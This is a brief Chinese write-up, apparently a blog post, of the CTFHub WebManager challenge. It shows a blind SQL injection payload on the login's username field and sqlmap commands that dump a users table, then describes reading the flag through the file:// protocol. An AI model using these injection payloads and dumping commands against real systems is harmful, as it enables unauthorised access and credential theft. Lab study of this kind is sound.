CTFHUB WEBSITE WEBMANAGER 通关

考点

ssrf

布尔盲注

测试登录页面 username参数位置可以进行布尔盲注

手工测试 a" or sleep(2)--+

参数使用post提交

保存数据包

利用sqlmap工具进行注入获取数据库 表 用户密码

python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db

python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username -D ctf -T users --dump

 爆破密码时,需要较长时间

利用密码进行登录  进入到文件读取页面

  抓包利用file伪协议获取flag

此次题目中可能存在其他sql注入点,读者可利用后台工具扫描目录结构,在进行sql注入,发散思维。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值